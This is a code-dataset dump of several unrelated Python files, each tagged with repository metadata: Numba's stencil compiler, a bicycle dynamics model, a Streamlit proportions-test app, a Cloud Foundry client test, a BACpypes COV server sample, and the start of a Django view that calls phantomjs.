raise NumbaValueError("Cannot use the reserved word 'out' in stencil kernels.")
sentinel_name = ir_utils.get_unused_var_name("__sentinel__", name_var_table)
if config.DEBUG_ARRAY_OPT >= 1:
print("name_var_table", name_var_table, sentinel_name)
the_array = args[0]
if config.DEBUG_ARRAY_OPT >= 1:
print("_stencil_wrapper", return_type, return_type.dtype,
type(return_type.dtype), args)
ir_utils.dump_blocks(kernel_copy.blocks)
# We generate a Numba function to execute this stencil and here
# create the unique name of this function.
stencil_func_name = "__numba_stencil_%s_%s" % (
hex(id(the_array)).replace("-", "_"),
self.id)
# We will put a loop nest in the generated function for each
# dimension in the input array. Here we create the name for
# the index variable for each dimension. index0, index1, ...
index_vars = []
for i in range(the_array.ndim):
index_var_name = ir_utils.get_unused_var_name("index" + str(i),
name_var_table)
index_vars += [index_var_name]
# Create extra signature for out and neighborhood.
out_name = ir_utils.get_unused_var_name("out", name_var_table)
neighborhood_name = ir_utils.get_unused_var_name("neighborhood",
name_var_table)
sig_extra = ""
if result is not None:
sig_extra += ", {}=None".format(out_name)
if "neighborhood" in dict(self.kws):
sig_extra += ", {}=None".format(neighborhood_name)
# Get a list of the standard indexed array names.
standard_indexed = self.options.get("standard_indexing", [])
if first_arg in standard_indexed:
raise NumbaValueError("The first argument to a stencil kernel must "
"use relative indexing, not standard indexing.")
if len(set(standard_indexed) - set(kernel_copy.arg_names)) != 0:
raise NumbaValueError("Standard indexing requested for an array name "
"not present in the stencil kernel definition.")
# Add index variables to getitems in the IR to transition the accesses
# in the kernel from relative to regular Python indexing. Returns the
# computed size of the stencil kernel and a list of the relatively indexed
# arrays.
kernel_size, relatively_indexed = self.add_indices_to_kernel(
kernel_copy, index_vars, the_array.ndim,
self.neighborhood, standard_indexed, typemap, copy_calltypes)
if self.neighborhood is None:
self.neighborhood = kernel_size
if config.DEBUG_ARRAY_OPT >= 1:
print("After add_indices_to_kernel")
ir_utils.dump_blocks(kernel_copy.blocks)
# The return in the stencil kernel becomes a setitem for that
# particular point in the iteration space.
ret_blocks = self.replace_return_with_setitem(kernel_copy.blocks,
index_vars, out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("After replace_return_with_setitem", ret_blocks)
ir_utils.dump_blocks(kernel_copy.blocks)
# Start to form the new function to execute the stencil kernel.
func_text = "def {}({}{}):\n".format(stencil_func_name,
",".join(kernel_copy.arg_names), sig_extra)
# Get loop ranges for each dimension, which could be either int
# or variable. In the latter case we'll use the extra neighborhood
# argument to the function.
ranges = []
for i in range(the_array.ndim):
if isinstance(kernel_size[i][0], int):
lo = kernel_size[i][0]
hi = kernel_size[i][1]
else:
lo = "{}[{}][0]".format(neighborhood_name, i)
hi = "{}[{}][1]".format(neighborhood_name, i)
ranges.append((lo, hi))
# If there are more than one relatively indexed arrays, add a call to
# a function that will raise an error if any of the relatively indexed
# arrays are of different size than the first input array.
if len(relatively_indexed) > 1:
func_text += " raise_if_incompatible_array_sizes(" + first_arg
for other_array in relatively_indexed:
if other_array != first_arg:
func_text += "," + other_array
func_text += ")\n"
# Get the shape of the first input array.
shape_name = ir_utils.get_unused_var_name("full_shape", name_var_table)
func_text += " {} = {}.shape\n".format(shape_name, first_arg)
# Converts cval to a string constant
def cval_as_str(cval):
if not np.isfinite(cval):
# See if this is a string-repr numerical const, issue #7286
if np.isnan(cval):
return "np.nan"
elif np.isinf(cval):
if cval < 0:
return "-np.inf"
else:
return "np.inf"
else:
return str(cval)
# If we have to allocate the output array (the out argument was not used)
# then us numpy.full if the user specified a cval stencil decorator option
# or np.zeros if they didn't to allocate the array.
if result is None:
return_type_name = numpy_support.as_dtype(
return_type.dtype).type.__name__
if "cval" in self.options:
cval = self.options["cval"]
if return_type.dtype != typing.typeof.typeof(cval):
msg = "cval type does not match stencil return type."
raise NumbaValueError(msg)
out_init ="{} = np.full({}, {}, dtype=np.{})\n".format(
out_name, shape_name, cval_as_str(cval),
return_type_name)
else:
out_init ="{} = np.zeros({}, dtype=np.{})\n".format(
out_name, shape_name, return_type_name)
func_text += " " + out_init
else: # result is present, if cval is set then use it
if "cval" in self.options:
cval = self.options["cval"]
cval_ty = typing.typeof.typeof(cval)
if not self._typingctx.can_convert(cval_ty, return_type.dtype):
msg = "cval type does not match stencil return type."
raise NumbaValueError(msg)
out_init = "{}[:] = {}\n".format(out_name, cval_as_str(cval))
func_text += " " + out_init
offset = 1
# Add the loop nests to the new function.
for i in range(the_array.ndim):
for j in range(offset):
func_text += " "
# ranges[i][0] is the minimum index used in the i'th dimension
# but minimum's greater than 0 don't preclude any entry in the array.
# So, take the minimum of 0 and the minimum index found in the kernel
# and this will be a negative number (potentially -0). Then, we do
# unary - on that to get the positive offset in this dimension whose
# use is precluded.
# ranges[i][1] is the maximum of 0 and the observed maximum index
# in this dimension because negative maximums would not cause us to
# preclude any entry in the array from being used.
func_text += ("for {} in range(-min(0,{}),"
"{}[{}]-max(0,{})):\n").format(
index_vars[i],
ranges[i][0],
shape_name,
i,
ranges[i][1])
offset += 1
for j in range(offset):
func_text += " "
# Put a sentinel in the code so we can locate it in the IR. We will
# remove this sentinel assignment and replace it with the IR for the
# stencil kernel body.
func_text += "{} = 0\n".format(sentinel_name)
func_text += " return {}\n".format(out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("new stencil func text")
print(func_text)
# Force the new stencil function into existence.
exec(func_text) in globals(), locals()
stencil_func = eval(stencil_func_name)
if sigret is not None:
pysig = utils.pysignature(stencil_func)
sigret.pysig = pysig
# Get the IR for the newly created stencil function.
from numba.core import compiler
stencil_ir = compiler.run_frontend(stencil_func)
ir_utils.remove_dels(stencil_ir.blocks)
# rename all variables in stencil_ir afresh
var_table = ir_utils.get_name_var_table(stencil_ir.blocks)
new_var_dict = {}
reserved_names = ([sentinel_name, out_name, neighborhood_name,
shape_name] + kernel_copy.arg_names + index_vars)
for name, var in var_table.items():
if not name in reserved_names:
new_var_dict[name] = ir_utils.mk_unique_var(name)
ir_utils.replace_var_names(stencil_ir.blocks, new_var_dict)
stencil_stub_last_label = max(stencil_ir.blocks.keys()) + 1
# Shift labels in the kernel copy so they are guaranteed unique
# and don't conflict with any labels in the stencil_ir.
kernel_copy.blocks = ir_utils.add_offset_to_labels(
kernel_copy.blocks, stencil_stub_last_label)
new_label = max(kernel_copy.blocks.keys()) + 1
# Adjust ret_blocks to account for addition of the offset.
ret_blocks = [x + stencil_stub_last_label for x in ret_blocks]
if config.DEBUG_ARRAY_OPT >= 1:
print("ret_blocks w/ offsets", ret_blocks, stencil_stub_last_label)
print("before replace sentinel stencil_ir")
ir_utils.dump_blocks(stencil_ir.blocks)
print("before replace sentinel kernel_copy")
ir_utils.dump_blocks(kernel_copy.blocks)
# Search all the block in the stencil outline for the sentinel.
for label, block in stencil_ir.blocks.items():
for i, inst in enumerate(block.body):
if (isinstance( inst, ir.Assign) and
inst.target.name == sentinel_name):
# We found the sentinel assignment.
loc = inst.loc
scope = block.scope
# split block across __sentinel__
# A new block is allocated for the statements prior to the
# sentinel but the new block maintains the current block
# label.
prev_block = ir.Block(scope, loc)
prev_block.body = block.body[:i]
# The current block is used for statements after sentinel.
block.body = block.body[i + 1:]
# But the current block gets a new label.
body_first_label = min(kernel_copy.blocks.keys())
# The previous block jumps to the minimum labelled block of
# the parfor body.
prev_block.append(ir.Jump(body_first_label, loc))
# Add all the parfor loop body blocks to the gufunc
# function's IR.
for (l, b) in kernel_copy.blocks.items():
stencil_ir.blocks[l] = b
stencil_ir.blocks[new_label] = block
stencil_ir.blocks[label] = prev_block
# Add a jump from all the blocks that previously contained
# a return in the stencil kernel to the block
# containing statements after the sentinel.
for ret_block in ret_blocks:
stencil_ir.blocks[ret_block].append(
ir.Jump(new_label, loc))
break
else:
continue
break
stencil_ir.blocks = ir_utils.rename_labels(stencil_ir.blocks)
ir_utils.remove_dels(stencil_ir.blocks)
assert(isinstance(the_array, types.Type))
array_types = args
new_stencil_param_types = list(array_types)
if config.DEBUG_ARRAY_OPT >= 1:
print("new_stencil_param_types", new_stencil_param_types)
ir_utils.dump_blocks(stencil_ir.blocks)
# Compile the combined stencil function with the replaced loop
# body in it.
ir_utils.fixup_var_define_in_scope(stencil_ir.blocks)
new_func = compiler.compile_ir(
self._typingctx,
self._targetctx,
stencil_ir,
new_stencil_param_types,
None,
compiler.DEFAULT_FLAGS,
{})
return new_func
def __call__(self, *args, **kwargs):
if (self.neighborhood is not None and
len(self.neighborhood) != args[0].ndim):
raise ValueError("{} dimensional neighborhood specified for {} "
"dimensional input array".format(
len(self.neighborhood), args[0].ndim))
if 'out' in kwargs:
result = kwargs['out']
rdtype = result.dtype
rttype = numpy_support.from_dtype(rdtype)
result_type = types.npytypes.Array(rttype, result.ndim,
numpy_support.map_layout(result))
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = tuple([typing.typeof.typeof(x) for x in args] +
[result_type])
else:
result = None
array_types = tuple([typing.typeof.typeof(x) for x in args])
array_types_full = array_types
if config.DEBUG_ARRAY_OPT >= 1:
print("__call__", array_types, args, kwargs)
(real_ret, typemap, calltypes) = self.get_return_type(array_types)
new_func = self._stencil_wrapper(result, None, real_ret, typemap,
calltypes, *array_types_full)
if result is None:
return new_func.entry_point(*args)
else:
return new_func.entry_point(*(args+(result,)))
def stencil(func_or_mode='constant', **options):
# called on function without specifying mode style
if not isinstance(func_or_mode, str):
mode = 'constant' # default style
func = func_or_mode
else:
mode = func_or_mode
func = None
for option in options:
if option not in ["cval", "standard_indexing", "neighborhood"]:
raise ValueError("Unknown stencil option " + option)
wrapper = _stencil(mode, options)
if func is not None:
return wrapper(func)
return wrapper
def _stencil(mode, options):
if mode != 'constant':
raise ValueError("Unsupported mode style " + mode)
def decorated(func):
from numba.core import compiler
kernel_ir = compiler.run_frontend(func)
return StencilFunc(kernel_ir, mode, options)
return decorated
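# Usage sketch (mirrors the documented @stencil API; kernels use relative indexing
# and the decorated object is called like a function on NumPy arrays):
#
#     @stencil
#     def kernel(a):
#         return 0.25 * (a[0, 1] + a[1, 0] + a[0, -1] + a[-1, 0])
#
#     smoothed = kernel(some_2d_array)   # out-of-bounds points filled with cval (default 0)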
@lower_builtin(stencil)
def stencil_dummy_lower(context, builder, sig, args):
"lowering for dummy stencil calls"
return lir.Constant(lir.IntType(types.intp.bitwidth), 0)
| 2.09375 | 2 |
examples/bicycle/bicycle_dynamics.py | lujieyang/irs_lqr | 6 | 4960 | <gh_stars>1-10
import numpy as np
import pydrake.symbolic as ps
import torch
import time
from irs_lqr.dynamical_system import DynamicalSystem
class BicycleDynamics(DynamicalSystem):
def __init__(self, h):
super().__init__()
"""
x = [x pos, y pos, heading, speed, steering_angle]
u = [acceleration, steering_velocity]
"""
self.h = h
self.dim_x = 5
self.dim_u = 2
"""Jacobian computations"""
self.x_sym = np.array([ps.Variable("x_{}".format(i)) for i in range(self.dim_x)])
self.u_sym = np.array([ps.Variable("u_{}".format(i)) for i in range(self.dim_u)])
self.f_sym = self.dynamics_sym(self.x_sym, self.u_sym)
self.jacobian_xu_sym = ps.Jacobian(self.f_sym, np.hstack((self.x_sym, self.u_sym)))
def dynamics_sym(self, x, u):
"""
Symbolic expression for dynamics. Used to compute
linearizations of the system.
x (np.array, dim: n): state
u (np.array, dim: m): action
"""
heading = x[2]
v = x[3]
steer = x[4]
dxdt = np.array([
v * ps.cos(heading),
v * ps.sin(heading),
v * ps.tan(steer),
u[0],
u[1]
])
x_new = x + self.h * dxdt
return x_new
def dynamics(self, x, u):
"""
Numeric expression for dynamics.
x (np.array, dim: n): state
u (np.array, dim: m): action
"""
heading = x[2]
v = x[3]
steer = x[4]
dxdt = np.array([
v * np.cos(heading),
v * np.sin(heading),
v * np.tan(steer),
u[0],
u[1]
])
x_new = x + self.h * dxdt
return x_new
def dynamics_batch(self, x, u):
"""
        Batch dynamics (vectorized NumPy implementation).
-args:
x (np.array, dim: B x n): batched state
u (np.array, dim: B x m): batched input
-returns:
xnext (np.array, dim: B x n): batched next state
"""
heading = x[:,2]
v = x[:,3]
steer = x[:,4]
dxdt = np.vstack((
v * np.cos(heading),
v * np.sin(heading),
v * np.tan(steer),
u[:,0],
u[:,1]
)).transpose()
x_new = x + self.h * dxdt
return x_new
def dynamics_batch_torch(self, x, u):
"""
        Batch dynamics. Uses PyTorch for GPU evaluation.
-args:
x (np.array, dim: B x n): batched state
u (np.array, dim: B x m): batched input
-returns:
xnext (np.array, dim: B x n): batched next state
"""
x = torch.Tensor(x).cuda()
u = torch.Tensor(u).cuda()
heading = x[:,2]
v = x[:,3]
steer = x[:,4]
dxdt = torch.vstack((
v * torch.cos(heading),
v * torch.sin(heading),
v * torch.tan(steer),
u[:,0],
u[:,1]
)).T
x_new = x + self.h * dxdt
return x_new
def jacobian_xu(self, x, u):
"""
        Recover the linearized dynamics dfdx as a function of x, u
"""
env = {self.x_sym[i]: x[i] for i in range(self.dim_x)}
env.update({self.u_sym[i]: u[i] for i in range(self.dim_u)})
f_x = ps.Evaluate(self.jacobian_xu_sym, env)
return f_x
def jacobian_xu_batch(self, x, u):
"""
        Recover the linearized dynamics dfd(xu) as a function of x, u
"""
dxdu_batch = np.zeros((
x.shape[0], x.shape[1], x.shape[1] + u.shape[1]))
for i in range(x.shape[0]):
dxdu_batch[i] = self.jacobian_xu(x[i], u[i])
return dxdu_batch
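def _example_single_step():
    # Usage sketch: one forward-Euler step of the kinematic bicycle model
    # (assumes pydrake and the DynamicalSystem base class are importable).
    dynamics = BicycleDynamics(h=0.1)
    x0 = np.array([0.0, 0.0, 0.0, 1.0, 0.1])  # [x, y, heading, speed, steering_angle]
    u0 = np.array([0.2, 0.0])                 # [acceleration, steering_velocity]
    return dynamics.dynamics(x0, u0), dynamics.jacobian_xu(x0, u0)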
| 2.875 | 3 |
apps/proportions.py | harmkenn/PST_Deploy_Test | 0 | 4961 | import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *
def app():
# title of the app
st.subheader("Proportions")
st.sidebar.subheader("Proportion Settings")
prop_choice = st.sidebar.radio("",["One Proportion","Two Proportions"])
if prop_choice == "One Proportion":
c1,c2,c3 = st.columns(3)
with c1:
x = int(st.text_input("Hits",20))
n = int(st.text_input("Tries",25))
with c2:
nullp = float(st.text_input("Null:",.7))
alpha = float(st.text_input("Alpha",.05))
with c3:
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat = x/n
tsd = math.sqrt(nullp*(1-nullp)/n)
cise = math.sqrt(p_hat*(1-p_hat)/n)
z = (p_hat - nullp)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat":p_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = p_hat - abs(me)
upper = p_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
if prop_choice == "Two Proportions":
c1,c2,c3 = st.columns(3)
with c1:
x1 = int(st.text_input("Hits 1",20))
n1 = int(st.text_input("Tries 1",25))
with c2:
x2 = int(st.text_input("Hits 2",30))
n2 = int(st.text_input("Tries 2",50))
with c3:
alpha = float(st.text_input("Alpha",.05))
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat1 = x1/n1
q_hat1 = 1 -p_hat1
p_hat2 = x2/n2
q_hat2 = 1 - p_hat2
pp_hat = (x1+x2)/(n1+n2)
dp_hat = p_hat1 - p_hat2
pq_hat = 1-pp_hat
tsd = math.sqrt(pp_hat*pq_hat*(1/n1+1/n2))
cise = math.sqrt(p_hat1*q_hat1/n1+p_hat2*q_hat2/n2)
z = (p_hat1 - p_hat2)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat 1":p_hat1,"p-Hat 2":p_hat2,"Pooled p-Hat":pp_hat,"Diff p-Hat":dp_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = dp_hat - abs(me)
upper = dp_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
| 3 | 3 |
integration/v2/test_service_instances.py | subhash12/cf-python-client | 47 | 4962 | <reponame>subhash12/cf-python-client<gh_stars>10-100
import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestServiceInstances(unittest.TestCase):
def test_create_update_delete(self):
client = build_client_from_configuration()
result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters)
if len(client.update_parameters) > 0:
client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters)
else:
_logger.warning("update test skipped")
client.v2.service_instances.remove(result["metadata"]["guid"])
def test_get(self):
client = build_client_from_configuration()
cpt = 0
for instance in client.v2.service_instances.list():
if cpt == 0:
self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"]))
self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"]))
self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"]))
cpt += 1
_logger.debug("test_get - %d found", cpt)
| 2.25 | 2 |
runway/core/providers/__init__.py | troyready/runway | 134 | 4963 | """Runway providers."""
| 1.015625 | 1 |
samples/COVServer.py | noelli/bacpypes | 0 | 4964 | #!/usr/bin/env python
"""
This sample application is a server that supports COV notification services.
The console accepts commands that change the properties of an object that
triggers the notifications.
"""
import time
from threading import Thread
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
from bacpypes.consolelogging import ConfigArgumentParser
from bacpypes.consolecmd import ConsoleCmd
from bacpypes.core import run, deferred, enable_sleeping
from bacpypes.task import RecurringTask
from bacpypes.app import BIPSimpleApplication
from bacpypes.object import AnalogValueObject, BinaryValueObject
from bacpypes.local.device import LocalDeviceObject
from bacpypes.service.cov import ChangeOfValueServices
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# test globals
test_av = None
test_bv = None
test_application = None
#
# SubscribeCOVApplication
#
@bacpypes_debugging
class SubscribeCOVApplication(BIPSimpleApplication, ChangeOfValueServices):
pass
#
# COVConsoleCmd
#
@bacpypes_debugging
class COVConsoleCmd(ConsoleCmd):
def do_status(self, args):
"""status"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_status %r", args)
global test_application
# dump from the COV detections dict
for obj_ref, cov_detection in test_application.cov_detections.items():
print("{} {}".format(obj_ref.objectIdentifier, obj_ref))
for cov_subscription in cov_detection.cov_subscriptions:
print(" {} proc_id={} confirmed={} lifetime={}".format(
cov_subscription.client_addr,
cov_subscription.proc_id,
cov_subscription.confirmed,
cov_subscription.lifetime,
))
def do_trigger(self, args):
"""trigger object_name"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_trigger %r", args)
global test_application
if not args:
print("object name required")
return
obj = test_application.get_object_name(args[0])
if not obj:
print("no such object")
return
# get the detection algorithm object
cov_detection = test_application.cov_detections.get(obj, None)
if (not cov_detection) or (len(cov_detection.cov_subscriptions) == 0):
print("no subscriptions for that object")
return
# tell it to send out notifications
cov_detection.send_cov_notifications()
def do_set(self, args):
"""set object_name [ . ] property_name [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# change the value
setattr(obj, property_name, value)
except IndexError:
print(COVConsoleCmd.do_set.__doc__)
except Exception as err:
print("exception: %s" % (err,))
def do_write(self, args):
"""write object_name [ . ] property [ = ] value"""
args = args.split()
if _debug: COVConsoleCmd._debug("do_set %r", args)
global test_application
try:
object_name = args.pop(0)
if '.' in object_name:
object_name, property_name = object_name.split('.')
else:
property_name = args.pop(0)
if _debug: COVConsoleCmd._debug(" - object_name: %r", object_name)
if _debug: COVConsoleCmd._debug(" - property_name: %r", property_name)
obj = test_application.get_object_name(object_name)
if _debug: COVConsoleCmd._debug(" - obj: %r", obj)
if not obj:
raise RuntimeError("object not found: %r" % (object_name,))
datatype = obj.get_datatype(property_name)
if _debug: COVConsoleCmd._debug(" - datatype: %r", datatype)
if not datatype:
raise RuntimeError("not a property: %r" % (property_name,))
# toss the equals
if args[0] == '=':
args.pop(0)
# evaluate the value
value = eval(args.pop(0))
if _debug: COVConsoleCmd._debug(" - raw value: %r", value)
# see if it can be built
obj_value = datatype(value)
if _debug: COVConsoleCmd._debug(" - obj_value: %r", obj_value)
# normalize
value = obj_value.value
if _debug: COVConsoleCmd._debug(" - normalized value: %r", value)
# pass it along
obj.WriteProperty(property_name, value)
except IndexError:
print(COVConsoleCmd.do_write.__doc__)
except Exception as err:
print("exception: %s" % (err,))
@bacpypes_debugging
class TestAnalogValueTask(RecurringTask):
"""
An instance of this class is created when '--avtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# make a list of test values
self.test_values = list(float(i * 10) for i in range(10))
def process_task(self):
if _debug: TestAnalogValueTask._debug("process_task")
global test_av
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueTask._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
@bacpypes_debugging
class TestAnalogValueThread(Thread):
"""
An instance of this class is created when '--avthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_av present value.
"""
def __init__(self, interval):
if _debug: TestAnalogValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = list(100.0 + float(i * 10) for i in range(10))
def run(self):
if _debug: TestAnalogValueThread._debug("run")
global test_av
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestAnalogValueThread._debug(" - next_value: %r", next_value)
# change the point
test_av.presentValue = next_value
# sleep
time.sleep(self.interval)
@bacpypes_debugging
class TestBinaryValueTask(RecurringTask):
"""
An instance of this class is created when '--bvtask <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueTask._debug("__init__ %r", interval)
RecurringTask.__init__(self, interval * 1000)
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def process_task(self):
if _debug: TestBinaryValueTask._debug("process_task")
global test_bv
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueTask._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
@bacpypes_debugging
class TestBinaryValueThread(RecurringTask, Thread):
"""
An instance of this class is created when '--bvthread <interval>' is
specified as a command line argument. Every <interval> seconds it
changes the value of the test_bv present value.
"""
def __init__(self, interval):
if _debug: TestBinaryValueThread._debug("__init__ %r", interval)
Thread.__init__(self)
# runs as a daemon
self.daemon = True
# save the interval
self.interval = interval
# make a list of test values
self.test_values = [True, False]
def run(self):
if _debug: TestBinaryValueThread._debug("run")
global test_bv
while True:
# pop the next value
next_value = self.test_values.pop(0)
self.test_values.append(next_value)
if _debug: TestBinaryValueThread._debug(" - next_value: %r", next_value)
# change the point
test_bv.presentValue = next_value
# sleep
time.sleep(self.interval)
def main():
global test_av, test_bv, test_application
# make a parser
parser = ConfigArgumentParser(description=__doc__)
parser.add_argument("--console",
action="store_true",
default=False,
help="create a console",
)
# analog value task and thread
parser.add_argument("--avtask", type=float,
help="analog value recurring task",
)
parser.add_argument("--avthread", type=float,
help="analog value thread",
)
    # binary value task and thread
parser.add_argument("--bvtask", type=float,
help="binary value recurring task",
)
parser.add_argument("--bvthread", type=float,
help="binary value thread",
)
# provide a different spin value
parser.add_argument("--spin", type=float,
help="spin time",
default=1.0,
)
# parse the command line arguments
args = parser.parse_args()
if _debug: _log.debug("initialization")
if _debug: _log.debug(" - args: %r", args)
# make a device object
this_device = LocalDeviceObject(ini=args.ini)
if _debug: _log.debug(" - this_device: %r", this_device)
# make a sample application
test_application = SubscribeCOVApplication(this_device, args.ini.address)
# make an analog value object
test_av = AnalogValueObject(
objectIdentifier=('analogValue', 1),
objectName='av',
presentValue=0.0,
statusFlags=[0, 0, 0, 0],
covIncrement=1.0,
)
_log.debug(" - test_av: %r", test_av)
# add it to the device
test_application.add_object(test_av)
_log.debug(" - object list: %r", this_device.objectList)
# make a binary value object
test_bv = BinaryValueObject(
objectIdentifier=('binaryValue', 1),
objectName='bv',
presentValue='inactive',
statusFlags=[0, 0, 0, 0],
)
_log.debug(" - test_bv: %r", test_bv)
# add it to the device
test_application.add_object(test_bv)
# make a console
if args.console:
test_console = COVConsoleCmd()
_log.debug(" - test_console: %r", test_console)
# enable sleeping will help with threads
enable_sleeping()
# analog value task
if args.avtask:
test_av_task = TestAnalogValueTask(args.avtask)
test_av_task.install_task()
# analog value thread
if args.avthread:
test_av_thread = TestAnalogValueThread(args.avthread)
deferred(test_av_thread.start)
# binary value task
if args.bvtask:
test_bv_task = TestBinaryValueTask(args.bvtask)
test_bv_task.install_task()
# binary value thread
if args.bvthread:
test_bv_thread = TestBinaryValueThread(args.bvthread)
deferred(test_bv_thread.start)
_log.debug("running")
run(args.spin)
_log.debug("fini")
if __name__ == "__main__":
main()
| 2.234375 | 2 |
server/glassface/facebookfriender/views.py | theopak/glassface | 1 | 4965 | import os
import platform
import subprocess
from django.http import HttpResponse
from django.conf import settings
def add(request, friend):
phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs')
